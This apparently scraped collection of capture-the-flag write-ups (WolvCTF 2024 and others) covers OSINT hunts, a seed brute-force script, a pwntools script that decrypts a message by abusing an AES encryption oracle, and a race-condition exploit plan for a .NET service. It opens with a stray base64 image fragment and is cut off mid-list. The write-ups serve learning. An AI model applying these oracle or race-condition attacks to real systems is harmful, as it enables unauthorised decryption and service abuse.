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) Steps to solve: 1. Convert flags.xlsx to a CSV2. Replace all `,` characters with new lines3. Do a search with the regex `^(?!fa)`. This is a negative lookahead search <https://stackoverflow.com/a/2967791> FLAG: `pearl{h3ll_0f_4n_3xc3l}`
Just a wee-little baby re challenge. [babyre](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Wolv-CTF-2024/beginner/babyre) --- No rev required! Run `strings babyre | grep "wctf"` to get the flag since it's written in the program itself. wctf{n1c3_oNe_y0u_Found_m3}
- Okay, this is weird. They had a whole forum going. - There must be something worthwhile in there. We knew that something like this was happening, but I wasn't sure what we'd find. - If they were posting here someone probably slipped up along the way. - We need to identify where and when they met with the agent who slipped them the intel. - Build your case on these members and, from that, we may identify the mole. - Do not slow down. A rolling stone gathers no moss, so time to shed the green, noobie. Flag Format: jctf{mm-dd-yyyy_Venue-Name} Developed by: Cyb0rgSw0rd --- Check out the user g0ldenfalc0n7 on the [forums](https://drtomlei.xyz/forums). See the writeup for crypto/aces-aes for how to find the forum. g0ldenfalc0n7's user page also has a letterboxd link that includes several reviews. After chasing red herrings regarding Barbie movies and restaurant locations (that were discussed on the forum), our team finally searched up "the rugged lands". This returned some results about a song by the Wu-Tang Clan. Note that the Wu-Tang Clan were also mentioned on g0ldenfalc0n7's instagram posts (which we found in our investigation for osint/cyber-daddy). The rugged lands seemed to be about the "Mysterious Land of Shaolin". Checking out g0ldenfalc0n7's reviews on letterboxd, we can find a review on the movie "The 36th Chamber of Shaolin" [here](https://letterboxd.com/g0ldenfalc0n7/film/the-36th-chamber-of-shaolin/). Take a look at this section of the review: ```Being a fan of Wu-Tang Clan, I couldn't resist writing about this. One of the best times I ever had watching this film was a few years back. I saw this movie years ago when RZA did a live scoring of it in DC. What a trip! Not only was this as good as every time I saw it in the past, but the live music created the perfect ambience and cover for discrete conversations about work. I still think fondly of this time, despite it really being about work. Could you even imagine seeing one of your favorite artists doing a live scoring for a film that inspired them and has had such a profound impact on your life at the same time? All while doing work you only dreamed about as a kid? Thinking on it, it still brings a smile to my face.``` Hmm. Seems like we're looking for a past concert venue of the Wu-Tang Clan and RZA, who is part of the Wu-Tang clan, in D.C. You can quickly search up a way to find past concert venues of the Wu-Tang Clan -- I used concertarchives.org. Scrolling back through the years, I found a match on [this page](https://www.concertarchives.org/bands/wu-tang-clan--2?date=past&page=10#concert-table) that included "RZA / Wu-Tang Clan" and was in 2018, which seemed promising. It turns out, it was the right flag! jctf{04-18-2018_Warner-Theatre} ### ThoughtsThis OSINT challenge actually took a lot longer than this short writeup seems to indicate. Overall, I probably spent 1-2 hours working on this :(
Someone told me WolvSec has a Reddit account. I wonder if they left a flag there... --- Search `wolvsec reddit` to find [this](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiv1oSvyfmEAxVIRzABHbySDqQQFnoECA4QAQ&url=https%3A%2F%2Fwww.reddit.com%2Fuser%2FWolvSec%2F&usg=AOvVaw1I0yziGyOnYTu2foWK2RxH&opi=89978449) user. The top post contains the flag! wctf{h41L_t0_th3_v1ct0rs_v4l14nt_h41L_t0_tH3_c0Nqu3r1nG_h3r035}
It's pretty easy to find random integers if you know the seed, but what if every second has a different seed? [chal_time.py](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Wolv-CTF-2024/crypto/limited-1/chal_time.py) --- We're provided a Python source: ```pyimport timeimport randomimport sys if __name__ == '__main__': flag = input("Flag? > ").encode('utf-8') correct = [189, 24, 103, 164, 36, 233, 227, 172, 244, 213, 61, 62, 84, 124, 242, 100, 22, 94, 108, 230, 24, 190, 23, 228, 24] time_cycle = int(time.time()) % 256 if len(flag) != len(correct): print('Nope :(') sys.exit(1) for i in range(len(flag)): random.seed(i+time_cycle) if correct[i] != flag[i] ^ random.getrandbits(8): print('Nope :(') sys.exit(1) print(flag) ``` So, basically, the seed for the `random.getrandbits(8)` call is changing for each byte. This is very easily brute-forceable, by simply looping over all possible initial seeds (only 256 possible values), decrypting, and then checking is the result is all ASCII to limit the results that need to be manually checked. ```pyimport random correct = [189, 24, 103, 164, 36, 233, 227, 172, 244, 213, 61, 62, 84, 124, 242, 100, 22, 94, 108, 230, 24, 190, 23, 228, 24]randvals = [] for i in range(256 + len(correct)): random.seed(i) randvals.append(random.getrandbits(8)) for i in range(256): curr = b'' isascii = True for j in range(len(correct)): x = correct[j] ^ randvals[i + j] if x >= 128: isascii = False break curr += chr(x).encode() if not isascii: continue print(curr)``` Alternatively, since we know the prefix of the flag is `wctf`, we can check which initial seed values result in this prefix, and then easily decrypt from there. ```pyimport random correct = [189, 24, 103, 164, 36, 233, 227, 172, 244, 213, 61, 62, 84, 124, 242, 100, 22, 94, 108, 230, 24, 190, 23, 228, 24] seed = -1for i in range(256): random.seed(i) f1 = correct[0] ^ random.getrandbits(8) random.seed(i + 1) f2 = correct[1] ^ random.getrandbits(8) if f1 == ord('w') and f2 == ord('c'): seed = i break for j in range(len(correct)): random.seed(seed + j) print(chr(correct[j] ^ random.getrandbits(8)), end='')``` Both scripts result in the flag! wctf{f34R_0f_m1ss1ng_0ut}
We managed to log into doubledelete's email server. Hopefully this should give us some leads... `nc blocked2.wolvctf.io 1337` [server.py](https://github.com/Nightxade/ctf-writeups/blob/master/assets/CTFs/Wolv-CTF-2024/crypto/blocked-2/server.py) --- We're given a Python source: ```py import randomimport secretsimport sysimport time from Crypto.Cipher import AESfrom Crypto.Util.Padding import padfrom Crypto.Util.strxor import strxor MASTER_KEY = secrets.token_bytes(16) def encrypt(message): if len(message) % 16 != 0: print("message must be a multiple of 16 bytes long! don't forget to use the WOLPHV propietary padding scheme") return None iv = secrets.token_bytes(16) cipher = AES.new(MASTER_KEY, AES.MODE_ECB) blocks = [message[i:i+16] for i in range(0, len(message), 16)] # encrypt all the blocks encrypted = [cipher.encrypt(b) for b in [iv, *blocks]] # xor with the next block of plaintext for i in range(len(encrypted) - 1): encrypted[i] = strxor(encrypted[i], blocks[i]) return iv + b''.join(encrypted) def main(): message = open('message.txt', 'rb').read() print(""" __ __ _ ______ / /___ / /_ _ __| | /| / / __ \\/ / __ \\/ __ \\ | / /| |/ |/ / /_/ / / /_/ / / / / |/ /|__/|__/\\____/_/ .___/_/ /_/|___/ /_/""") print("[ email portal ]") print("you are logged in as [email protected]") print("") print("you have one new encrypted message:") print(encrypt(message).hex()) while True: print(" enter a message to send to [email protected], in hex") s = input(" > ") message = bytes.fromhex(s) print(encrypt(message).hex()) main() ``` Basically, the encryption process is as follows: 1. A secret MASTER_KEY is generated for all encryptions in a single session 2. The message is processed, and is ensured to be a multiple of 16 3. A random IV is generated for each encryption 4. An AES cipher in ECB mode is created with the session's MASTER_KEY 5. The message is split into blocks of 16 6. The IV and blocks are all encrypted via the AES ECB to form the encrypted array 7. Each element of the encrypted array is XORed with the next block of plaintext. Essentially, the IV is XORed with the first block of plaintext, the first block of plaintext is XORed with the second block, etc. et. 8. The IV + the elements of encrypted are returned There are a couple key things to note here. First, we are provided the original IV. Second, the last encrypted block is **not** XORed with anything, so it is just the AES ECB encryption of the last block of plaintext. After a long time of thinking (45-60 minutes), I finally managed to figure it out. It all lies in the second realization, that the last encrypted block is not XORed with anything. We are provided an encryption oracle, so we can encrypt anything we want. Well, what if we sent in just the IV of the ciphertext of the original email we need to decrypt? Well, the very last 16 bytes of the returned ciphertext would be only the AES ECB encryption of the IV. Well, the first block of the encrypted array is equivalent to xor(AES ECB encryption of the IV, first block of plaintext). Well, we can just XOR this first block of the encrypted array with the value we have found for the AES ECB encryption of the IV to receive the first block of plaintext! Once we do that, we can simply continue this down the blocks, with the first block of plaintext now replacing the IV. We'll send in the first block of plaintext to be encrypted, take the last 16 bytes of the result and XOR it with the second block of the encrypted array of the original ciphertext to get the second plaintext. Here's the implementation: ```pyfrom pwn import *from Crypto.Util.strxor import strxorimport binascii p = remote('blocked2.wolvctf.io', 1337) p.recvuntil(b'message:\n')ct = p.recvline().decode('ascii')[:-1]# print(ct) current_plain = ct[:32]for i in range(len(ct)//32 - 1): p.sendlineafter(b'> ', current_plain) ct1 = p.recvline().decode('ascii')[:-1] current_plain = strxor(binascii.unhexlify(ct[32*(i+1):32*(i+2)]), binascii.unhexlify(ct1[-32:])) print(current_plain.decode('ascii'), end='') current_plain = binascii.hexlify(current_plain)``` This decrypts the following message: ```those wolvsec nerds really think they're "good at security" huh... running the ransomware was way too easy. i've uploaded their files to our secure storage, let me know when you have them[email protected]wctf{s0m3_g00d_s3cur1ty_y0u_h4v3_r0lling_y0ur_0wn_crypt0_huh}``` There's the flag! wctf{s0m3_g00d_s3cur1ty_y0u_h4v3_r0lling_y0ur_0wn_crypt0_huh}
**[Hardware - BunnyPass](https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-hardware-a45ddedae49b#725c)** https://cybersecmaverick.medium.com/htb-cyber-apocalypse-ctf-2024-hardware-a45ddedae49b#725c
*For the full experience with images see the original blog post!* This challenge was released with the final batch of challenges of the qualifiers, 6 hours before end.Some of our team (including, but not limited to, me) had already worked pretty much through the night, but we anticipated the challenges eagerly.Thankfully, we managed to get the first and only solve for this challenge with great team work. The challenge provides us with a .NET Core C# binary (for example see all the .NET symbols with `strings`).With luck, you can decompile such binaries with tools like dotPeek or ILSpy.[Liam](https://wachter-space.de) quickly realized this and exported an archive of C# files from dotPeek for us. Interacting a bit with the program (you can connect to a local instance at port 3284) we can generate a session ticket and are then greeted by the system: > Welcome to Campbell Airstrip, Anchorage.>> Runway 1 is available. Please provide a callsign: With the challenge description I already found a reference to the name [PCaS](https://en.wikipedia.org/wiki/Portable_collision_avoidance_system), setting the theme for the challenge.Specifically, the challenge is implemented as a kind of airport controller, processing planes from loading to takeoff. Looking at `AirportSession.cs`, we find that we (sadly) get the flag as an apology if all runways are blocked with crashed airplanes.The `AirportSession` is a big state machine handling the flow of processing a plane (see diagram). AirportSession processing state machine The processing contains some important information: - Callsigns must match the regex `r"^[A-Z]{3}[A-Z0-9]{1,}$"`- Plane data contains runway, number of containers & max takeoff weight- We need to provide a minimum of `NumberOfContainers / 2`, to stay economical of course- Loading can run into a timeout- There is a crash check at takeoff LoadPlane function in Airport The most important logic is implemented in `Aiport.cs` though.When loading a plane, the `LoadPlane` method starts a worker thread and weights for a signal before retrieving and returning the result.The method `DoWork` tries to get the optimal loading configuration with a branch and bound knapsack solver and is cancelled after 15 seconds.Sadly, the `Solver` does enforce the maximum takeoff weight.When the worker thread gets a result, it sets a static `_result` variable and then sets the signal. DoWork function in Airport Notably, all the `Airport` code is implemented with threads but is not designed to simultaneously process multiple planes at the same `Airport`.We can however connect multiple times to the same aiport with our ticket, even to the same runway because it only reserved in `Airport.GetPlane`, after providing a callsign in the session.Thus we can start loading multiple planes at nearly the same time, and the first completed result will be set for all planes.We abuse this race condition for our exploit. Our exploit strategy is as follows: - Spawn several connections including reserve connection- Send callsign for all but reserve (I had to use "SPIN", maybe you'll get the reference)- Get plane data- Send problem depending on max weight - More difficult problem for connections with small max weight (fraction of max weight, full number of containers; not too complex because of timeout) - Simple one for large max weight (minimum possible number, all max weight already; quick solve)- Start simultaneously- Collect load configurations to find overloaded plane- If found check clearance - Possibly finish takeoff of wrong plane and cancel rest (resets to runway state `Free` ?) - Set runway state to reserved again with reserve connection (sending callsign now) - Request clearance for overloaded plane- Try 